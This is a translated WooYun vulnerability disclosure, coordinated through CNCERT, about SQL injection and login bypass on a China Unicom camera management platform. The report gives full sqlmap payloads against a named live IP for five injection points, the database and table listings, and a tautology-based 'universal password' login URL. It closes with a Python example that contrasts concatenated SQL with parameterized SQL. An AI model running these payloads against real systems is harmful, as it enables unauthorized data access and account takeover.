
Defect ID: wooyun-2015-0128242

Title: A China Unicom camera management platform has multiple SQL injection vulnerabilities and allows login to any account with a "universal password"

Vendor: China Unicom

Author: 浮萍

Submitted: 2015-07-22 11:00

Fixed: 2015-09-09 22:08

Published: 2015-09-09 22:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (CNCERT, National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-07-22: Details sent to the vendor, awaiting vendor handling
2015-07-26: Vendor confirmed; details visible to the vendor only
2015-08-05: Details opened to core white hats and relevant domain experts
2015-08-15: Details opened to regular white hats
2015-08-25: Details opened to intern white hats
2015-09-09: Details opened to the public

Summary:

Multiple SQL injections
Some require login (just register any account); some do not
Universal-password login

Detailed description:

The same host as before: http://210.22.8.98/
Register any account.
First location: sub-account management.
Enter a username, click Query, then capture the request.

选区_012.png


http://210.22.8.98/user/manageUser.action?deviceName=&serialNo=&userName=admin

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: deviceName (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: deviceName=') AND (SELECT * FROM (SELECT(SLEEP(5)))YWdr) AND ('LQFC'='LQFC&serialNo=&userName=admin
---
[22:31:32] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.64
back-end DBMS: MySQL 5.0.12


Databases

available databases [5]:
[*] db_register
[*] dserver_1
[*] information_schema
[*] mysql
[*] test


current database:    'dserver_1'


Database: dserver_1
[6 tables]
+---------------+
| DeviceAssign |
| DvipDevice |
| GroupInfo |
| UserAppServer |
| UserDevice |
| UserInfo |
+---------------+


UserInfo holds 923 users

选区_013.png


Proof of vulnerability:

Second location: add camera

选区_014.png


Capture the request:

http://210.22.8.98/dwr/call/plaincall/DwrDeviceInfo.validteDevice.dwr?callCount=1&page=%2Fdevice%2FmanageDevice.action&httpSessionId=&scriptSessionId=1437490048942&c0-scriptName=DwrDeviceInfo&c0-methodName=validteDevice&c0-id=0&c0-param0=string%3Aa&c0-param1=string%3Aa%27&batchId=15&locale=zh_CN


URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 208 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrDeviceInfo.validteDevice.dwr?callCount=1&page=/device/manageDevice.action&httpSessionId=&scriptSessionId=1437490048942&c0-scriptName=DwrDeviceInfo&c0-methodName=validteDevice&c0-id=0&c0-param0=string:a&c0-param1=-3416' OR 4230=4230#&batchId=14&locale=zh_CN
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrDeviceInfo.validteDevice.dwr?callCount=1&page=/device/manageDevice.action&httpSessionId=&scriptSessionId=1437490048942&c0-scriptName=DwrDeviceInfo&c0-methodName=validteDevice&c0-id=0&c0-param0=string:a&c0-param1=-6325' OR 1 GROUP BY CONCAT(0x71707a6b71,(SELECT (CASE WHEN (1583=1583) THEN 1 ELSE 0 END)),0x71626a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&batchId=14&locale=zh_CN
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrDeviceInfo.validteDevice.dwr?callCount=1&page=/device/manageDevice.action&httpSessionId=&scriptSessionId=1437490048942&c0-scriptName=DwrDeviceInfo&c0-methodName=validteDevice&c0-id=0&c0-param0=string:a&c0-param1=string:a' AND (SELECT * FROM (SELECT(SLEEP(5)))DgzL)#&batchId=14&locale=zh_CN
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrDeviceInfo.validteDevice.dwr?callCount=1&page=/device/manageDevice.action&httpSessionId=&scriptSessionId=1437490048942&c0-scriptName=DwrDeviceInfo&c0-methodName=validteDevice&c0-id=0&c0-param0=string:a&c0-param1=string:a' UNION ALL SELECT CONCAT(0x71707a6b71,0x67557570654a6e4b6d6d,0x71626a7171),NULL,NULL#&batchId=14&locale=zh_CN
---
[23:15:22] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.64
back-end DBMS: MySQL 5.0.12


---
Third location: User Settings -> Authorization Management
This was already reported in WooYun: 中国联通某摄像管理平台存在SQL注入漏洞 (A China Unicom camera management platform has an SQL injection vulnerability) and marked as fixed, but only a warning message was added; it was never actually fixed.
Although the page reports that the username is invalid, capturing the request shows it can still be injected.

选区_015.png


Capture the request:

http://210.22.8.98/dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=%2Fuser%2FsettingUser.action&httpSessionId=&scriptSessionId=1437491764823&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string%3Aadmin*&batchId=2&locale=zh_CN


选区_016.png


URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 62 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSessionId=1437491764823&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string:admin' AND 6848=6848 AND 'AZKS'='AZKS&batchId=2&locale=zh_CN
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSessionId=1437491764823&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string:admin' AND (SELECT 4204 FROM(SELECT COUNT(*),CONCAT(0x717a717871,(SELECT (ELT(4204=4204,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HyvO'='HyvO&batchId=2&locale=zh_CN
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSessionId=1437491764823&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string:admin' AND (SELECT * FROM (SELECT(SLEEP(5)))vlzP) AND 'YEng'='YEng&batchId=2&locale=zh_CN
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSessionId=1437491764823&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string:admin' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717871,0x4a767346447770756664,0x716b716b71)#&batchId=2&locale=zh_CN
---
[23:18:54] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.64
back-end DBMS: MySQL 5.0


Fourth location: login
http://210.22.8.98/login.action?userName=admin*&userPassword=a

GET parameter 'userName' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 105 HTTP(s) requests:
---
Parameter: userName (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: userName=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))gqOP) AND 'IdOb'='IdOb&userPassword=a
---
[23:25:32] [INFO] the back-end DBMS is MySQL
web application technology: JSP, Apache 2.0.64
back-end DBMS: MySQL 5.0.12


Fifth location: registration

选区_017.png


The first three injection points require a cookie; registering any user is enough.
The last two require no login.
The password recovery page was presumably not successfully fixed either.
Finally, a universal-password login:
Username: test' or 'a'='a
Password: anything
But it has to be entered in the address bar,
for example by visiting:

http://210.22.8.98/login.action?userName=test%27%20or%20%27a%27=%27a&userPassword=a


Logged in directly

选区_018.png


Fix recommendation:

This system is just...
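The report gives no concrete fix, so here is an added illustration (not code from the platform or the report): the string-concatenated login lookup that the universal-password payload above defeats, beside the parameterized form that treats the same input as data. It assumes a UserInfo table with userName and userPassword columns and uses sqlite3 standing in for the platform's MySQL; the exact query the platform runs is not on the page, so the constructed one is only one query shape that behaves as the report describes.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the platform's UserInfo table
    (table layout and the sample row are assumptions, not page data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserInfo (userName TEXT, userPassword TEXT)")
    conn.execute("INSERT INTO UserInfo VALUES ('admin', 'S3cret!')")
    return conn


def login_vulnerable(conn, user_name, user_password):
    """Builds the WHERE clause by concatenation. With the report's username
    test' or 'a'='a the clause becomes
        userPassword='...' AND userName='test' or 'a'='a'
    which is true for every row, so the first user (admin) is returned
    regardless of the password. Returns the matched userName or None."""
    sql = ("SELECT userName FROM UserInfo WHERE userPassword='" + user_password
           + "' AND userName='" + user_name + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, user_name, user_password):
    """Same lookup with bound parameters: the quote in the username is
    compared literally and never reaches the SQL parser. Note that this is
    the server-side fix; a front-end 'invalid username' message like the one
    at the third location does nothing for requests sent directly to the
    endpoint."""
    sql = "SELECT userName FROM UserInfo WHERE userPassword=? AND userName=?"
    row = conn.execute(sql, (user_password, user_name)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "test' or 'a'='a"
    print("vulnerable:", login_vulnerable(db, payload, "anything"))  # admin
    print("fixed:     ", login_fixed(db, payload, "anything"))       # None
```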

Copyright notice: when reposting, please credit 浮萍@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-07-26 22:06

Vendor reply:

CNVD confirmed and reproduced the described situation and has forwarded it via CNCERT to China Unicom Group, which will coordinate handling with the website administration unit or the software developer. Based on a combined score across the multiple risks, rank 20.

Latest status:

None yet